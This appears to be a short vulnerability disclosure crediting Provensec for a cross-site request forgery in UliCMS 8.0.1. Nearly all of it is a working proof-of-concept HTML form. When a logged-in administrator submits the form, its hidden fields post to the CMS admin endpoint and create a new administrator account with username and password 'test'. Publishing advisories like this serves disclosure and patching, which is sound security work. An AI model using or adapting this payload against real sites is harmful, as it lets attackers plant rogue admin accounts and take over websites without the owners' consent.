# Affected software: UliCMS 8.0.1
# Type of vulnerability: admin add exploit (csrf)
# URL: http://en.ulicms.de/
# Discovered by: Provensec
# Website: http://www.provensec.com
#version  8.0.1
# Proof of concept


<html>

  <body>
    <form action="
http://demo.opensourcecms.com/ulicms/admin/index.php?action=admins"
method="POST">
      <input type="hidden" name="add&#95;admin" value="add&#95;admin" />
      <input type="hidden" name="admin&#95;username" value="test" />
      <input type="hidden" name="admin&#95;lastname" value="test" />
      <input type="hidden" name="admin&#95;firstname" value="test" />
      <input type="hidden" name="admin&#95;email" value="test" />
      <input type="hidden" name="admin&#95;password" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>